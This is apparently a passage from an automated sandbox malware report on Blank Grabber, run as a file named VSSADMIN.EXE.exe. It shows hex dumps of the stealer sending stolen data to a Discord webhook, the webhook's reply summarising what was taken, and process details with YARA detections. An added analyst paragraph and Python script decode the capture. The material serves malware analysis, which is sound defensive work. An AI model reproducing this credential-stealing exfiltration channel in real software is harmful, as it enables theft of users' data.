                                                                                                                                                                    2023-09-15 20:16:20 UTC656OUTData Raw: ca fb f5 31 1c 0a aa 2e 64 14 56 40 f1 5b 2b 08 9e 6d 0a fc d5 a8 af 23 64 b0 eb 08 4c a9 8b 33 6e 55 1f 4b 1e 9f 2e 7f ec f6 b3 57 8c 23 f5 36 f9 e2 78 2e 15 f4 43 55 47 56 55 3c 83 9a 2b de 7a d6 98 8b 4c bc 68 36 2c 72 d9 08 9f 05 09 60 f7 00 e2 67 56 0b d5 78 2c 4a ba ad ca fa 65 e4 1d 9f 3b ba 9b 98 24 3d 0d 1f 8f 91 22 38 70 3a bd f4 29 d0 ad 16 b6 51 09 23 4b 8a 01 50 92 fc 3a 14 40 0c 42 b5 02 f4 07 7c b1 53 27 57 16 b7 ff d7 6d ae b1 0f 47 bf db c1 65 06 8c 5d 0b 0a b6 c8 8e 65 26 08 b4 e8 49 99 4b 1c a2 ad b6 24 1b 00 5f 0a da 25 df 48 95 c5 3b 06 21 7b b6 96 34 2b 46 d0 6c 13 14 a7 76 28 0e 28 09 6d 4c 17 4f c7 00 32 fa c4 64 8c 31 ed 1e 9a 9d ff 23 50 7d 81 c7 f1 7f 45 5d 8c bc 90 ea ab 04 5e f9 ec 6b ce 46 ad 89 61 91 ed 80 ca 07 9a 4e d5 fc
                                                                                                                                                                    Data Ascii: 1.dV@[+m#dL3nUK.W#6x.CUGVU<+zLh6,r`gVx,Je;$="8p:)Q#KP:@B|S'WmGe]e&IK$_%H;!{4+Flv((mLO2d1#P}E]^kFaN
                                                                                                                                                                    2023-09-15 20:16:20 UTC672OUTData Raw: d5 db 48 6c 80 c3 fe 32 c8 e9 ce 43 08 ac 2b f2 6f bb 94 43 5b de 1a 80 a9 80 e2 6e ff f2 b3 f6 c0 8d ab e0 71 b6 2e b0 7c 18 90 c0 78 62 6a 56 cd b7 4a a8 e7 bb 2e 31 31 e0 39 8f f9 39 f9 c0 e8 6a 5e 84 9c 8c a0 51 59 90 1d b4 68 34 a2 bd 86 07 b3 20 31 bc 24 03 b0 48 39 36 9e 6e 64 f9 32 2f 6f 5e 64 45 b9 a8 9b 01 a4 e2 9d d2 28 dd 8b 9f 6e f1 c5 7d 2f e2 ca 6f 9d 99 43 60 54 1c 91 1f 60 2d bf b5 bb 03 10 64 b7 33 80 66 96 8a c2 26 d9 d4 ec ca b1 98 16 f0 7e 4b 02 ef a6 11 6b 4b 40 76 21 88 06 3e fb 90 61 05 e4 19 13 7f 6b 31 74 6b 48 dc fd 43 c5 c5 40 12 57 ba 41 32 f4 8f 9d af b6 87 60 c4 65 ed 0f 96 a9 4a 95 26 bc b4 59 ca 7b 58 4d 72 71 a8 6e 3e 1b 16 86 e0 2e b8 dc 94 a6 32 5a bd 40 10 fb 45 ff 55 cb 41 c7 fe d6 13 99 8c 91 6a 50 63 46 44 83 cd 00
                                                                                                                                                                    Data Ascii: Hl2C+oC[nq.|xbjVJ.1199j^QYh4 1$H96nd2/o^dE(n}/oC`T`-d3f&~KkK@v!>ak1tkHC@WA2`eJ&Y{XMrqn>.2Z@EUAjPcFD
                                                                                                                                                                    2023-09-15 20:16:20 UTC688OUTData Raw: 6e d2 46 84 27 28 02 19 4d d6 4b 2d ee 45 cf ac b1 d7 07 ec 5a 86 d4 9f b0 9b 3c 69 d6 13 4a c1 05 c7 91 52 7d 8d ae 25 8a 41 20 22 f3 b5 f0 68 5d 5b d2 a2 fb 60 e0 87 82 5f 59 b2 5c 17 9e eb 13 47 30 0d b3 01 cd 7d 9b d3 8b 1f 38 bb e3 f5 25 80 8e 68 fc ee b9 88 a4 1c 05 27 7a 16 dd 39 fb cc f5 2c 23 dc f1 db 41 08 0b 86 dd 65 60 ee 14 c3 46 d4 56 7c f2 76 9b 38 81 7b aa 26 61 6e 77 16 8f 0b 32 bb a2 c5 38 7d 34 e2 44 2d 58 90 ee 6c 46 e1 42 22 d2 bc 91 47 14 bf d6 fd c4 3c bf 65 13 14 21 f3 f3 1a ca c8 ae 04 3e da b9 ce 37 5b 2a 33 b4 dd e2 cd fb 84 bb 9f 81 b3 51 77 76 8b a5 94 e9 51 e7 dd b9 23 c8 e0 da f7 39 ac a5 6e 69 76 57 53 c4 53 cc f2 3a 64 64 3e ad 64 1c 22 b9 e0 fb 01 ba 2b cd 2c 98 2c 53 65 f9 5d 71 b1 f7 59 25 86 6b 11 9d e1 fc 09 21 f0 3b
                                                                                                                                                                    Data Ascii: nF'(MK-EZ<iJR}%A "h][`_Y\G0}8%h'z9,#Ae`FV|v8{&anw28}4D-XlFB"G<e!>7[*3QwvQ#9nivWSS:dd>d"+,,Se]qY%k!;
                                                                                                                                                                    2023-09-15 20:16:20 UTC704OUTData Raw: 54 50 ca 77 e4 15 24 74 ba 5c 9e 4b e3 d1 10 0a 3d 0a c5 31 9f e2 cf 92 c3 07 09 b1 71 45 06 36 59 c0 67 1c 65 55 79 79 74 e4 c0 02 09 bd 79 4f f8 be 65 6a f3 b3 00 c8 67 ca 5d 79 d0 0b 6b 53 b2 81 73 ef 56 c1 7b db f2 01 15 b0 8b fd 8a 59 bf c4 ee d6 ec 2a 5f c3 25 39 1a 5a 3f b8 1c 31 99 c3 00 a4 5a 4a 77 46 fe 9e 99 e1 0f 15 73 67 d8 65 b1 2d d2 88 07 0d 19 74 dc 93 c7 09 0a 63 e1 a2 9e 49 47 5e 0c ee 8e ed 82 c9 63 2a d8 24 a0 3c 17 62 4d fb b5 1a f0 de 65 d8 38 a4 5c 46 14 3c c2 5e 1a d8 bf dd 61 a2 76 37 79 38 11 b2 bb dc 9e ac 08 f2 c6 03 64 32 f5 0f 01 4a 4b 3f 62 d9 7b 71 c7 11 f9 c9 c4 66 66 43 d0 d1 28 48 fa 0c 0c 2b 50 a8 dd de 1d e8 62 fb a4 5f 4e c7 fa ec bb d5 42 b7 ad c3 ad 5b 83 47 ba cc d1 b0 e4 7b d1 ba 9f b7 61 af c2 95 e2 14 bd 16 cf
                                                                                                                                                                    Data Ascii: TPw$t\K=1qE6YgeUyytyOejg]ykSsV{Y*_%9Z?1ZJwFsge-tcIG^c*$<bMe8\F<^av7y8d2JK?b{qffC(H+Pb_NB[G{a
                                                                                                                                                                    2023-09-15 20:16:20 UTC720OUTData Raw: db 36 95 76 8b c6 56 ee 6a e7 eb 12 52 af 4c b0 48 23 5b ec 53 bd b4 6a 6c 0b 48 0e d8 0d 5e d7 f7 99 40 41 d8 bf 6a 0a 6b a4 90 6f 3a 18 4c 57 23 39 42 68 d5 b3 b2 41 aa c1 4b 85 83 15 e4 b2 d9 e0 ac 35 4f 86 c8 a1 83 31 b1 da eb ed db f9 93 98 3f 76 cf 44 3d 7d 67 8c 98 08 70 50 6c 56 53 95 8e 26 f0 da c8 ef 1d 87 d1 68 a4 81 67 15 86 60 76 a4 2d 66 f4 ef 75 87 67 13 af cd ad 77 01 cf 5e 54 23 ea 53 d5 f8 ca ed 9a ac ad 51 81 15 62 1a 97 d6 bd 88 75 e1 2b af 8c 2b c3 14 42 4a 52 95 c5 1f bc 77 46 38 e2 6f 23 e6 a0 53 f0 ed a2 3b 69 f2 23 6e fa 41 3e 99 22 30 9e db 82 25 b5 97 06 a1 aa 32 88 06 fb e3 3f 12 7d dd 75 55 e1 29 61 ee 2a de a6 31 20 1b 54 6a 8f e2 49 45 0a 10 cf c5 e4 73 a7 40 4d e8 6b bf 07 59 e3 72 24 b2 d6 bf 82 72 81 b2 7e 7f fa 51 ce 3f
                                                                                                                                                                    Data Ascii: 6vVjRLH#[SjlH^@Ajko:LW#9BhAK5O1?vD=}gpPlVS&hg`v-fugw^T#SQbu++BJRwF8o#S;i#nA>"0%2?}uU)a*1 TjIEs@MkYr$r~Q?
                                                                                                                                                                    2023-09-15 20:16:20 UTC736OUTData Raw: fe 7f c4 d2 70 d5 f6 a7 52 d6 43 ef 3c b6 66 3b a5 6f 7e 5d ec d1 cb 8e 89 30 fd b7 98 a4 55 f0 03 d4 83 d6 66 cf ed 96 c6 e8 70 d1 30 8f 82 76 cb b7 37 11 0f 88 07 4a e9 ff 55 ed 60 a9 8f 4e 60 00 de 42 05 76 1e 79 82 a6 1f 53 1a 07 93 b0 5e e8 04 be 30 f3 67 75 01 db e4 8a 05 64 53 07 c9 c0 22 e3 f8 9b 28 2b f7 19 97 b1 6e 7a c8 98 ed 46 d5 3a 8c 9a 43 b8 b6 fd 5a 03 58 a3 0d 18 6f c0 44 1f 52 10 24 94 da 52 74 22 1d e4 c6 1d eb e8 2f 5b 83 ad 6e 0a c7 5b ec 8b a8 21 72 35 5a 43 0e 9c 26 22 8b ad e3 7d 7e 59 1d 24 a3 87 40 3b 73 18 48 e7 08 06 6d 4c c8 74 67 5c 8a 47 12 68 7e 07 51 53 97 49 aa 17 4c d4 1a fb 00 e2 60 df 29 61 76 ba cd 79 e8 ef 6a 70 b0 65 b0 82 31 e3 58 d1 4f f5 58 8a e0 4f be fd 48 d6 37 f0 83 ab 7b 27 77 b8 3a 28 16 db 90 c7 a3 08 ba
                                                                                                                                                                    Data Ascii: pRC<f;o~]0Ufp0v7JU`N`BvyS^0gudS"(+nzF:CZXoDR$Rt"/[n[!r5ZC&"}~Y$@;sHmLtg\Gh~QSIL`)avyjpe1XOXOH7{'w:(
                                                                                                                                                                    2023-09-15 20:16:20 UTC752OUTData Raw: d3 ec b2 f5 6e 4c 1d dc 52 cb 86 21 50 bd 49 f7 36 77 c6 e6 85 94 44 56 19 ee ee a3 1d 3f 4c fd 48 9b 77 46 47 b1 98 18 b8 e5 20 61 1d 58 5f ab 9d 9e c7 32 3c ea 87 5f ef 6e 1c 9e 8b 54 26 3c 1d 89 7b 1c 53 df f8 da 78 16 8e 1a 3a b6 2e 60 2c 90 2a 91 c1 2a af b4 dd 41 61 a0 16 87 3c 66 bc 2f 88 6c f4 b2 61 b0 3e e7 76 08 92 a3 cb 08 a8 1b fc ef df 06 32 94 55 ac 31 24 e4 69 3a ba a3 ae 7d bb 14 06 c1 69 86 24 9a 06 82 5b 01 a7 93 9c 43 85 92 ad bb 7a de 70 a9 87 25 b7 a8 8b ff 53 8d 75 e3 34 e1 e9 37 2a 73 d7 14 4b c3 13 7a d5 56 d6 91 07 f0 55 7a e0 9f 62 75 d3 fd d0 5f d2 c9 ef 3d 42 70 ea b3 d8 ad 70 c5 ce 5c 34 d5 61 5a e9 e4 b6 72 37 67 55 ba 5c 2d 5e 1f ce 34 1d b3 f9 5f 69 74 9a c2 30 32 2f 12 d6 bf e5 8d 73 5d 68 5d 50 51 49 42 ff 3b 4c 3d 19 0d
                                                                                                                                                                    Data Ascii: nLR!PI6wDV?LHwFG aX_2<_nT&<{Sx:.`,**Aa<f/la>v2U1$i:}i$[Czp%Su47*sKzVUzbu_=Bpp\4aZr7gU\-^4_it02/s]h]PQIB;L=
                                                                                                                                                                    2023-09-15 20:16:20 UTC768OUTData Raw: 13 c1 ef dc 94 06 fd 40 ae 07 ba 0a bc ce 67 0e a5 a2 9e 15 12 b4 24 f5 39 9c d0 a8 5f 2b 64 ad 4d ae af 47 f7 18 90 7a b8 43 9e 7c 7f 3d 83 be 89 18 90 19 81 53 8a c6 ee af f0 cd 6b 51 fa 7e e9 b4 3a 4e ac 61 9b b6 ef 5b 9a 6b b0 1b 57 dc 50 d5 30 35 e7 89 03 16 66 eb c3 79 f9 c6 7a 00 82 6d df 3b c5 64 bc db 80 ab 44 36 3b cc e7 cd 67 ca cb eb 3c c0 82 72 5b 05 38 51 e0 56 38 51 60 3e b1 39 0b 61 ed 63 f1 18 99 9e 41 b9 d3 38 a7 e6 9c 63 c6 07 4d 55 e5 44 4e 8f 46 c0 51 89 7e 11 85 b0 80 a5 c1 5a de 5c 3b a5 d7 91 e8 9a 44 cd 62 cc e2 37 b1 19 32 8c e5 e6 64 b7 46 a5 d2 53 7c 64 be 8b 61 7d 21 83 59 8d cc 28 f1 fd f4 0b bd ed 7d b2 03 01 b7 e2 32 87 41 39 ca 80 05 b5 36 23 8d 90 ec 50 87 32 ce 9a 10 16 38 db 02 bc 5d 55 33 58 2e 29 0b 6e 26 e6 ec 04 d5
                                                                                                                                                                    Data Ascii: @g$9_+dMGzC|=SkQ~:Na[kWP05fyzm;dD6;g<r[8QV8Q`>9acA8cMUDNFQ~Z\;Db72dFS|da}!Y(}2A96#P28]U3X.)n&
                                                                                                                                                                    2023-09-15 20:16:20 UTC784OUTData Raw: e5 b5 bd db 35 a3 63 9c 13 61 58 92 ae 74 61 d4 1a 8e 71 00 b9 01 e3 34 30 bb e3 87 90 00 10 fd 34 df 50 1f 19 86 b0 56 b9 8b ad 31 70 a0 54 16 65 40 98 8a ac 3e 19 bf 49 87 34 e2 96 68 7c 28 68 fd 1a be 3c 8f 91 8d 62 4a 27 90 1d 0e 52 76 72 90 7b e6 28 88 22 a2 38 5b 2b a5 e6 e3 88 fc 97 89 5d 8d f5 97 d9 6f b5 dc 94 70 75 03 06 d8 53 68 a1 26 67 aa f2 9d d7 fe df 55 39 09 f0 43 9e 8d 0e 6a ee 3c 05 cb 47 55 ba 91 0a 83 29 7d fe 6e 5f cc 3e 78 da 84 86 7b 93 bf 4d 66 f1 95 a0 27 5e 46 44 46 3e 83 78 a0 c2 68 a9 3f 73 b8 24 a6 e5 30 f4 86 97 93 58 5c b9 74 62 7e e4 e4 d3 a8 2b a9 c0 35 03 5a 5f 2f 99 cc 56 aa 07 97 46 46 a1 33 b8 2b a9 71 6f df ea 30 e1 16 fc 4c 0a c7 e9 58 2b 79 22 11 9c c4 ec bb db c3 cf de ff 13 ac 6a c8 5d 7e 70 52 9c d0 93 04 78 9f
                                                                                                                                                                    Data Ascii: 5caXtaq404PV1pTe@>I4h|(h<bJ'Rvr{("8[+]opuSh&gU9Cj<GU)}n_>x{Mf'^FDF>xh?s$0X\tb~+5Z_/VFF3+qo0LX+y"j]~pRx
                                                                                                                                                                    2023-09-15 20:16:20 UTC800OUTData Raw: 38 8c 84 51 81 9d e3 24 84 b3 95 37 a8 9b 17 d8 ec 4c e9 8a d6 0a 8c 50 5d 04 5d d2 e2 93 6d 6b 47 8d 61 c5 c1 7b ff 39 40 14 e4 77 00 e7 0a 2c 83 5f 72 80 ee 5e 0c 26 e2 5d aa e2 e7 48 c3 68 76 0d a5 3b a4 7b 3a 47 13 1b 2b 32 97 c4 94 db 62 2b 2e 4c cf 0e 54 b7 8b 12 4e ef 29 6f c1 fe af fc 66 c0 77 37 1f 76 ad a0 a7 e9 89 e0 c0 59 1e 9b 59 e0 01 c4 15 39 92 b3 5f e8 d8 fa b7 9b f4 5d 7e 20 c9 c0 1e a4 41 b3 60 14 3c 01 86 77 d5 53 6e 23 1f 8c bc 59 dc 49 37 95 9a 2d c5 5d f0 13 cd 3e 5e 13 91 19 70 8e 6c ae 30 a9 2c 5d b5 3a 8d 31 d1 db 9d 66 36 05 28 f8 39 24 00 8d 1c 56 f3 21 75 34 0c be 98 92 e4 0a 48 d2 a5 d9 66 f9 df 48 1f 4e a9 96 a7 7c 8a d7 8f f2 52 a0 4b fe 9b ae 3b a3 90 df 7b f9 f9 7f 54 ef 6b 62 ad ba df 73 41 2a fc bc 69 bd 19 5d cb 1c 3d
                                                                                                                                                                    Data Ascii: 8Q$7LP]]mkGa{9@w,_r^&]Hhv;{:G+2b+.LTN)ofw7vYY9_]~ A`<wSn#YI7-]>^pl0,]:1f6(9$V!u4HfHN|RK;{TkbsA*i]=
                                                                                                                                                                    2023-09-15 20:16:20 UTC816OUTData Raw: f4 76 6a 23 20 46 f5 78 23 37 d3 05 5e 59 21 c0 07 2f 87 5c cb 63 9c d3 6a 87 45 6a 6b a8 49 76 dc bf 0f be d2 09 eb 76 64 96 6b c4 fc 80 66 a4 c1 af b1 ea a4 f4 08 56 7f 14 15 f5 6f d4 15 28 89 74 90 28 bd 9d 22 c2 02 4e 4b f9 10 e6 ba 51 98 38 3b bf a2 58 d6 a4 1a a0 60 b1 f3 86 d5 86 42 2b ad 18 74 f6 07 b3 67 6c d8 d4 d7 a6 b6 02 4b 7a ea 62 c3 23 d6 db c7 64 69 10 5f 6d 91 ad 76 65 1a bd 82 5c c2 76 a7 68 8e e1 08 77 1f 7a f5 fe 8f f0 02 69 be 17 8e a4 8d 6a b5 a9 5d c4 3a 65 58 ed a2 5a a9 51 70 e3 6e 74 d6 15 03 a8 81 bb 7e 15 c2 ac ba 84 8a b8 05 63 a0 a5 d0 93 6b 36 55 44 23 f3 8f 92 50 21 06 de 3a 0a 36 57 29 9c 2d f0 9d 35 32 cb 9a 67 2c 22 37 bb e5 2f 4a 25 6c 5a e5 3d e0 4f 86 2a a6 00 e3 02 ad 27 46 d8 20 ad 2a 53 66 0b 21 5c 6a dd 79 56 fb
                                                                                                                                                                    Data Ascii: vj# Fx#7^Y!/\cjEjkIvvdkfVo(t("NKQ8;X`B+tglKzb#di_mve\vhwzij]:eXZQpnt~ck6UD#P!:6W)-52g,"7/J%lZ=O*'F *Sf!\jyV
                                                                                                                                                                    2023-09-15 20:16:21 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Fri, 15 Sep 2023 20:16:21 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    set-cookie: __dcfduid=bc633d50540411ee9a38c27f7ba35664; Expires=Wed, 13-Sep-2028 20:16:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                    x-ratelimit-limit: 5
                                                                                                                                                                    x-ratelimit-remaining: 4
                                                                                                                                                                    x-ratelimit-reset: 1694808982
                                                                                                                                                                    x-ratelimit-reset-after: 1
                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZpXguzwIvcgLV29%2BSR9Y0%2FYvpHE6mRXE6g4yciUl9uIsbAlww%2FVIdzinNacW4jbASef2zdyITW8UiGlTqPJ79cRNZdFa8mfryQREU9lYqBfK7NMmCbLGk145A0wm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Set-Cookie: __sdcfduid=bc633d50540411ee9a38c27f7ba35664c109257d842e195ebaed0275ef14ee36899ff93df3541f71ce642e6fcb59e134; Expires=Wed, 13-Sep-2028 20:16:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                    Set-Cookie: __cfruid=bdf8bc33dab33955ba05e6ec71dc8699b1d1bda2-1694808981; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    2023-09-15 20:16:21 UTC820INData Raw: 43 46 2d 52 41 59 3a 20 38 30 37 33 38 62 66 64 65 61 32 36 30 66 38 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: CF-RAY: 80738bfdea260f85-EWR
                                                                                                                                                                    2023-09-15 20:16:21 UTC820INData Raw: 38 39 30 0d 0a 7b 22 69 64 22 3a 22 31 31 35 32 33 33 37 31 32 39 36 34 35 35 35 35 39 31 34 22 2c 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 7c 7c 40 65 76 65 72 79 6f 6e 65 7c 7c 22 2c 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 22 31 31 32 35 31 32 36 33 39 36 31 30 31 30 32 31 38 37 39 22 2c 22 61 75 74 68 6f 72 22 3a 7b 22 69 64 22 3a 22 31 31 32 35 33 35 37 33 32 39 37 39 38 34 31 38 34 37 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 20 47 72 61 62 62 65 72 22 2c 22 61 76 61 74 61 72 22 3a 22 32 39 65 30 65 65 63 63 66 34 30 33 65 34 39 61 63 38 38 39 39 30 32 38 63 61 65 31 34 64 30 63 22 2c 22 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 22 3a 22 30 30 30 30 22 2c 22 70 75 62 6c 69 63 5f 66 6c 61 67 73 22 3a 30 2c 22 66 6c 61
                                                                                                                                                                    Data Ascii: 890{"id":"1152337129645555914","type":0,"content":"||@everyone||","channel_id":"1125126396101021879","author":{"id":"1125357329798418472","username":"Blank Grabber","avatar":"29e0eeccf403e49ac8899028cae14d0c","discriminator":"0000","public_flags":0,"fla
                                                                                                                                                                    2023-09-15 20:16:21 UTC821INData Raw: 66 69 20 50 61 73 73 77 6f 72 64 73 20 3a 20 30 5c 6e 57 65 62 63 61 6d 20 3a 20 30 5c 6e 4d 69 6e 65 63 72 61 66 74 20 53 65 73 73 69 6f 6e 73 20 3a 20 30 5c 6e 45 70 69 63 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 53 74 65 61 6d 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 55 70 6c 61 79 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 47 72 6f 77 74 6f 70 69 61 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 53 63 72 65 65 6e 73 68 6f 74 20 3a 20 59 65 73 5c 6e 53 79 73 74 65 6d 20 49 6e 66 6f 20 3a 20 4e 6f 60 60 60 2a 2a 22 2c 22 63 6f 6c 6f 72 22 3a 33 34 33 30 33 2c 22 74 68 75 6d 62 6e 61 69 6c 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 42 6c 61 6e 6b 2d 63 2f 42
                                                                                                                                                                    Data Ascii: fi Passwords : 0\nWebcam : 0\nMinecraft Sessions : 0\nEpic Session : No\nSteam Session : No\nUplay Session : No\nGrowtopia Session : No\nScreenshot : Yes\nSystem Info : No```**","color":34303,"thumbnail":{"url":"https://raw.githubusercontent.com/Blank-c/B
                                                                                                                                                                    2023-09-15 20:16:21 UTC822INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0
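The response above is the Discord webhook acknowledging the grabber's upload: a chunked JSON message object whose embed summarises what was stolen ("Screenshot : Yes", "System Info : No"), with Discord's rate-limit headers (5 per bucket, 4 remaining) alongside. The report prints the body as hex rows and cuts the 0x890-byte chunk short, so recovering the message means joining the rows, stripping the chunk framing and only then parsing JSON. The following is an added example, not code from the report or from Blank Grabber, that does exactly that; make_sample_capture, hex_rows_to_bytes, split_headers, dechunk and parse_webhook_reply are hypothetical helper names, SAMPLE_MESSAGE is a constructed, shortened message reusing only values visible on the page, and the assumption that the summary sits in embeds[].description follows Discord's standard message layout (the page truncates before that key name appears).

```python
import json
from typing import Dict, List, Tuple

# Constructed sample message, not bytes from the report. It keeps only fields
# visible on the page (id, content, channel_id, author.username, the
# "Screenshot : Yes / System Info : No" summary, color 34303) and assumes the
# standard Discord message layout, where the summary lives in
# embeds[].description; the page truncates before that key name is shown.
SAMPLE_MESSAGE = {
    "id": "1152337129645555914",
    "type": 0,
    "content": "||@everyone||",
    "channel_id": "1125126396101021879",
    "author": {"id": "1125357329798418472", "username": "Blank Grabber",
               "discriminator": "0000"},
    "embeds": [{"description": "**```Screenshot : Yes\nSystem Info : No```**",
                "color": 34303}],
}


def make_sample_capture(message: dict) -> List[str]:
    """Render a constructed HTTP/1.1 chunked JSON response as the
    'Data Raw:' hex rows the sandbox prints (server side of the exchange)."""
    body = json.dumps(message, separators=(",", ":")).encode()
    raw = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: application/json\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"x-ratelimit-limit: 5\r\n"
        b"x-ratelimit-remaining: 4\r\n"
        b"CF-RAY: 80738bfdea260f85-EWR\r\n"
        b"\r\n"
        + f"{len(body):x}\r\n".encode() + body + b"\r\n"   # one sized chunk
        + b"0\r\n\r\n"                                       # terminating chunk
    )
    return ["Data Raw: " + " ".join(f"{b:02x}" for b in raw[i:i + 64])
            for i in range(0, len(raw), 64)]


def hex_rows_to_bytes(rows: List[str]) -> bytes:
    """Join 'Data Raw:' rows (in capture order) back into one byte stream."""
    return b"".join(bytes.fromhex(row.split("Data Raw:")[-1]) for row in rows)


def split_headers(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split status line and headers from the body; header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {":status": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def dechunk(body: bytes) -> bytes:
    """Decode Transfer-Encoding: chunked. Raises ValueError when the capture
    stops mid-chunk, which is what a truncated sandbox dump looks like."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            raise ValueError("no chunk-size line at offset %d" % pos)
        size = int(body[pos:nl].split(b";")[0].strip(), 16)   # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out)
        if pos + size + 2 > len(body) or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk at offset %d (wanted %d bytes)" % (pos, size))
        out += body[pos:pos + size]
        pos += size + 2


def parse_webhook_reply(rows: List[str]) -> Dict[str, object]:
    """Turn captured rows into the facts an analyst wants from the reply."""
    headers, body = split_headers(hex_rows_to_bytes(rows))
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    msg = json.loads(body.decode("utf-8"))
    lines: List[str] = []
    for embed in msg.get("embeds", []):
        # The grabber wraps its summary in Discord markdown (** and ```).
        text = embed.get("description", "").strip("*`")
        lines.extend(l.strip() for l in text.splitlines() if l.strip())
    return {
        "status": headers[":status"],
        "ratelimit_remaining": int(headers.get("x-ratelimit-remaining", "-1")),
        "author": msg.get("author", {}).get("username"),
        "content": msg.get("content"),
        "embed_lines": lines,
    }


if __name__ == "__main__":
    print(json.dumps(parse_webhook_reply(make_sample_capture(SAMPLE_MESSAGE)), indent=2))
```

Feeding the report's own rows to parse_webhook_reply raises the truncated-chunk error rather than a JSON error, which is the right diagnosis: the exfil confirmation is complete on the wire, only the report's rendering of it is cut, so the full body has to be pulled from the PCAP instead of the HTML.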


                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:22:15:54
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Imagebase:0x7ff614c70000
                                                                                                                                                                    File size:7'380'816 bytes
                                                                                                                                                                    MD5 hash:B8E16B93BE678043EC587EC1C759C2DE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
Start time:22:15:54
Start date:15/09/2023
Path:C:\Users\user\Desktop\VSSADMIN.EXE.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\Desktop\VSSADMIN.EXE.exe
Imagebase:0x7ff614c70000
File size:7'380'816 bytes
MD5 hash:B8E16B93BE678043EC587EC1C759C2DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
